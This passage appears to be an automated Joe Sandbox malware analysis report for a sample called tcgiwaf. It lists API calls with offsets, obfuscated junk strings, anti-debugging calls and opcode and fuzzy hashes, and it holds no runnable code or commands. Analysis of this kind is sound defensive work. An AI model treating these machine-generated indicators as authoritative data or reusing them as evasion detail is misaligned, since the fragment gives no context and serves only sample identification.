                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Interlocked$CommName$CreateExchangeFileFormatIncrementInfoVersion$AttributesClearComputerConfigConsoleCurrencyDialogDriveEnumErrorFormatsGlobalInputLocaleLogicalMaskMountNumberPathPointReadSemaphoreShortStringsTempTimeVerifyVolumeWire_memset
                                              • String ID: $panigalixamadigagorov sowojacekiludumidige polocemor
                                              • API String ID: 2730911676-1733501012
                                              • Opcode ID: d23e2264d0ef8cecea8dfaee8da5a593530ee72d2ec632fc149d14f78439c9d7
                                              • Instruction ID: 5e0aa9075be5d75de1ab1b599fef44862665e49ad9bf97c726e7214364ea247a
                                              • Opcode Fuzzy Hash: d23e2264d0ef8cecea8dfaee8da5a593530ee72d2ec632fc149d14f78439c9d7
                                              • Instruction Fuzzy Hash: 2B811EB5D40218AFEB10CF94DD49BADBBB8BB48701F104165F605B72D0D7B46A44CF59
                                              APIs
                                              • GetNumberFormatW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004035BF
                                              • CreateJobObjectA.KERNEL32(00000000,00000000), ref: 004035C5
                                              • GetConsoleAliasExesA.KERNEL32(?,00000000), ref: 004035D0
                                              • CreateNamedPipeW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004035E6
                                              • SetFileShortNameW.KERNEL32(00000000,00000000), ref: 004035F0
                                              • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040360A
                                              • GetTimeFormatW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040361C
                                              • GetModuleFileNameW.KERNEL32(00000000,00000000,00000000), ref: 00403624
                                              • TlsGetValue.KERNEL32(00000000), ref: 0040362C
                                              • SetEnvironmentVariableW.KERNEL32(00000000,?), ref: 0040363B
                                              • GetTimeFormatW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040364D
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0040365A
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: CreateFileFormatName$ModuleTime$AliasConsoleEnvironmentExesNamedNumberObjectPipeProcessShortValueVariable
                                              • String ID:
                                              • API String ID: 4163992861-0
                                              • Opcode ID: c696d350f9cbd58aeb209f839cb97cd2d3af78f45c1cfbe8e87d3c802f68113d
                                              • Instruction ID: ee29fcefd4d71f99ff44f49a2115cb02694ff77d511bbf1d43b7a3e3e6c29421
                                              • Opcode Fuzzy Hash: c696d350f9cbd58aeb209f839cb97cd2d3af78f45c1cfbe8e87d3c802f68113d
                                              • Instruction Fuzzy Hash: CA21CC75A40344BBF3509FA0DE09F997B78EB48707F004065F708B61E0CAB05584CB69
                                              APIs
                                              • GetCurrentDirectoryA.KERNEL32(00000000,?,?,?,2C788E9F,18A3A711,224BFD48,7FC70782,09E143CA,17C3CCF2,541A7EB8,315CA5DA,224BFD48,6E8781CC,32F3EFCE,224BFD48), ref: 00403DD5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory
                                              • String ID: 5Myi$Kn$b6$ZV7$y9=
                                              • API String ID: 1611563598-2733252791
                                              • Opcode ID: 32edf5b412df797890cec91c07ae5d8e206d8e81fd75e990c405da7a973fa397
                                              • Instruction ID: dd277fa5bcd038b3fb73d8ded35ed20b6e10e6fa25372812213cf8750d62d16f
                                              • Opcode Fuzzy Hash: 32edf5b412df797890cec91c07ae5d8e206d8e81fd75e990c405da7a973fa397
                                              • Instruction Fuzzy Hash: 7CA1FDB5E00328DFDB24CFAAD98A68DFBB4BF04314F608588E5597B612D7309A81CF45
                                              APIs
                                              • IsDebuggerPresent.KERNEL32 ref: 0040A957
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A96C
                                              • UnhandledExceptionFilter.KERNEL32(00401A6C), ref: 0040A977
                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 0040A993
                                              • TerminateProcess.KERNEL32(00000000), ref: 0040A99A
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                              • String ID:
                                              • API String ID: 2579439406-0
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00008CF6), ref: 00408D3D
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
                                              • String ID:
                                              • API String ID: 2477803136-0
                                              APIs
                                              • GetFileAttributesW.KERNEL32(nodeteriyucanisi pivibuyasedigozudaruzezune rafuxinetisekipocovovavomikatan), ref: 00403951
                                              • GetShortPathNameA.KERNEL32(rupajineligigepubofe,?,00000000), ref: 00403961
                                              • GlobalFree.KERNEL32(00000000), ref: 00403965
                                              • GetEnvironmentStrings.KERNEL32 ref: 00403967
                                              • SetComputerNameW.KERNEL32(00000000), ref: 0040396F
                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00403984
                                              • LoadLibraryA.KERNEL32(00451B18), ref: 004039E7
                                              Strings
                                              • nodeteriyucanisi pivibuyasedigozudaruzezune rafuxinetisekipocovovavomikatan, xrefs: 0040394C
                                              • rupajineligigepubofe, xrefs: 0040395C
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Name$AttributesComputerEnvironmentExchangeFileFreeGlobalInterlockedLibraryLoadPathShortStrings
                                              • String ID: nodeteriyucanisi pivibuyasedigozudaruzezune rafuxinetisekipocovovavomikatan$rupajineligigepubofe
                                              • API String ID: 163159629-979419650
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Exception@8Throw_memcpy_sstd::exception::exception
                                              • String ID: h7@$h7@$h7@
                                              • API String ID: 464988439-3733659376
                                              APIs
                                              • __CreateFrameInfo.LIBCMT ref: 00409E82
                                                • Part of subcall function 00405306: __getptd.LIBCMT ref: 00405314
                                                • Part of subcall function 00405306: __getptd.LIBCMT ref: 00405322
                                              • __getptd.LIBCMT ref: 00409E8C
                                                • Part of subcall function 0040978E: __getptd_noexit.LIBCMT ref: 00409791
                                                • Part of subcall function 0040978E: __amsg_exit.LIBCMT ref: 0040979E
                                              • __getptd.LIBCMT ref: 00409E9A
                                              • __getptd.LIBCMT ref: 00409EA8
                                              • __getptd.LIBCMT ref: 00409EB3
                                              • _CallCatchBlock2.LIBCMT ref: 00409ED9
                                                • Part of subcall function 004053AB: __CallSettingFrame@12.LIBCMT ref: 004053F7
                                                • Part of subcall function 00409F80: __getptd.LIBCMT ref: 00409F8F
                                                • Part of subcall function 00409F80: __getptd.LIBCMT ref: 00409F9D
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                              • String ID:
                                              • API String ID: 1602911419-0
                                              APIs
                                              • __getptd.LIBCMT ref: 00409BC3
                                                • Part of subcall function 0040978E: __getptd_noexit.LIBCMT ref: 00409791
                                                • Part of subcall function 0040978E: __amsg_exit.LIBCMT ref: 0040979E
                                              • __getptd.LIBCMT ref: 00409BD4
                                              • __getptd.LIBCMT ref: 00409BE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                              • String ID: MOC$csm
                                              • API String ID: 803148776-1389381023
                                              APIs
                                              • __getptd.LIBCMT ref: 0040B83F
                                                • Part of subcall function 0040978E: __getptd_noexit.LIBCMT ref: 00409791
                                                • Part of subcall function 0040978E: __amsg_exit.LIBCMT ref: 0040979E
                                              • __amsg_exit.LIBCMT ref: 0040B85F
                                              • __lock.LIBCMT ref: 0040B86F
                                              • InterlockedDecrement.KERNEL32(?), ref: 0040B88C
                                              • InterlockedIncrement.KERNEL32(0044B7D8), ref: 0040B8B7
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                              • String ID:
                                              • API String ID: 4271482742-0
                                              APIs
                                              • __lock.LIBCMT ref: 0040665F
                                                • Part of subcall function 00407F98: __mtinitlocknum.LIBCMT ref: 00407FAE
                                                • Part of subcall function 00407F98: __amsg_exit.LIBCMT ref: 00407FBA
                                                • Part of subcall function 00407F98: EnterCriticalSection.KERNEL32(?,?,?,0040CCC0,00000004,0044A150,0000000C,0040ADAA,?,?,00000000,00000000,00000000,?,00409740,00000001), ref: 00407FC2
                                              • ___sbh_find_block.LIBCMT ref: 0040666A
                                              • ___sbh_free_block.LIBCMT ref: 00406679
                                              • HeapFree.KERNEL32(00000000,00000000,00449DB8,0000000C,004047E6,?,00403271), ref: 004066A9
                                              • GetLastError.KERNEL32 ref: 004066BA
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                              • String ID:
                                              • API String ID: 2714421763-0
                                              APIs
                                                • Part of subcall function 00404495: __EH_prolog3.LIBCMT ref: 0040449C
                                                • Part of subcall function 00404495: std::bad_exception::bad_exception.LIBCMT ref: 004044B9
                                                • Part of subcall function 00404495: __CxxThrowException@8.LIBCMT ref: 004044C7
                                              • std::_String_base::_Xlen.LIBCPMT ref: 00403EB1
                                                • Part of subcall function 0040445D: __EH_prolog3.LIBCMT ref: 00404464
                                                • Part of subcall function 0040445D: std::bad_exception::bad_exception.LIBCMT ref: 00404481
                                                • Part of subcall function 0040445D: __CxxThrowException@8.LIBCMT ref: 0040448F
                                              • _memcpy_s.LIBCMT ref: 00403F26
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: Exception@8H_prolog3Throwstd::bad_exception::bad_exception$String_base::_Xlen_memcpy_sstd::_
                                              • String ID: h7@$h7@
                                              • API String ID: 2371884630-3958829557
                                              APIs
                                              • ___BuildCatchObject.LIBCMT ref: 0040A21A
                                                • Part of subcall function 0040A175: ___BuildCatchObjectHelper.LIBCMT ref: 0040A1AB
                                              • _UnwindNestedFrames.LIBCMT ref: 0040A231
                                              • ___FrameUnwindToState.LIBCMT ref: 0040A23F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                              • String ID: csm
                                              • API String ID: 2163707966-1018135373
                                              APIs
                                              • GetModuleHandleA.KERNEL32(KERNEL32,0040B4BA), ref: 0040D8A6
                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040D8B6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                              • API String ID: 1646373207-3105848591
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 0040449C
                                                • Part of subcall function 00403DF0: _strlen.LIBCMT ref: 00403E0A
                                              • std::bad_exception::bad_exception.LIBCMT ref: 004044B9
                                                • Part of subcall function 0040440E: std::runtime_error::runtime_error.LIBCPMT ref: 00404419
                                              • __CxxThrowException@8.LIBCMT ref: 004044C7
                                                • Part of subcall function 00404FCB: RaiseException.KERNEL32(?,?,00404E1A,?,?,?,?,?,00404E1A,?,0044A290,00450F64,h7@,?,00000000,0004A7A8), ref: 0040500D
                                              Strings
                                              • invalid string position, xrefs: 004044A1
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: ExceptionException@8H_prolog3RaiseThrow_strlenstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
                                              • String ID: invalid string position
                                              • API String ID: 843739861-1799206989
                                              • Opcode ID: 700d1af2c4eaf03bea565af7b03dbead500a3d3712d730e22dc07129d8cefecd
                                              • Instruction ID: fae6d0ca2df376a34d2d3c54931f6281d6c7b07355819c79e81589d3f49b10fc
                                              • Opcode Fuzzy Hash: 700d1af2c4eaf03bea565af7b03dbead500a3d3712d730e22dc07129d8cefecd
                                              • Instruction Fuzzy Hash: 31F0BE7260022867DB00EAD2CC07FDE7668EB54725F20053BB300B65C2CAB8AA1087DC
                                              APIs
                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040FF80
                                              • __isleadbyte_l.LIBCMT ref: 0040FFB4
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000000,?,00000000,00000000,?,?,?,?,00000000,00000000,00000020), ref: 0040FFE5
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000000,00000001,00000000,00000000,?,?,?,?,00000000,00000000,00000020), ref: 00410053
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                              • String ID:
                                              • API String ID: 3058430110-0
                                              • Opcode ID: 0fe08e492a7b4ff5ea08ac429b4288c07587bbbeb0e40681d3b2b653b8e442b5
                                              • Instruction ID: 6f1f2b8560cac9da387ead87ac30bd7774921d8b2c3af18f7002eefdcb8e7388
                                              • Opcode Fuzzy Hash: 0fe08e492a7b4ff5ea08ac429b4288c07587bbbeb0e40681d3b2b653b8e442b5
                                              • Instruction Fuzzy Hash: E231DD31A00246EFCB20DF64C880EAA7BA5BF06310F15867BF461AB6E1D334DD85DB58
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                              • String ID:
                                              • API String ID: 3016257755-0
                                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                              • Instruction ID: 76e4944cf1066dc640bca3c999aabeb8e3301f05ae3b73433418f1691f27eaf4
                                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                              • Instruction Fuzzy Hash: AD11833680014ABBCF125EC4CC41CEE3F26BB0C354B588426FE1869171C73BC9B5AB85
                                              APIs
                                              • __getptd.LIBCMT ref: 0040BFAB
                                                • Part of subcall function 0040978E: __getptd_noexit.LIBCMT ref: 00409791
                                                • Part of subcall function 0040978E: __amsg_exit.LIBCMT ref: 0040979E
                                              • __getptd.LIBCMT ref: 0040BFC2
                                              • __amsg_exit.LIBCMT ref: 0040BFD0
                                              • __lock.LIBCMT ref: 0040BFE0
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                              • String ID:
                                              • API String ID: 3521780317-0
                                              • Opcode ID: 9466699e1d6d4f156f53832724690a1e9375424cfaf0cbf22267286efaff49e4
                                              • Instruction ID: fb037f692e3fe67861f911b46272c7bec88e35a78bfb52665c800fbba86c3d7a
                                              • Opcode Fuzzy Hash: 9466699e1d6d4f156f53832724690a1e9375424cfaf0cbf22267286efaff49e4
                                              • Instruction Fuzzy Hash: E5F0FF36954705DAD720BB76884674A72A0EF40719F14427FE440B72D2DB7CA940CE9E
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.4143833215.0000000000402000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.4143781084.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143804647.0000000000401000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143833215.000000000041E000.00000020.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143895137.000000000044B000.00000008.00000001.01000000.00000005.sdmp
                                              • Associated: 00000007.00000002.4143919671.000000000045D000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_tcgiwaf.jbxd
                                              Similarity
                                              • API ID: String_base::_Xlen_memcpy_sstd::_
                                              • String ID: h7@
                                              • API String ID: 923394732-1600037422
                                              • Opcode ID: 7af812c84f83da7910aacffbf650c5ec9dfb8aff5ddf6e7aab8b77b6688a95a4
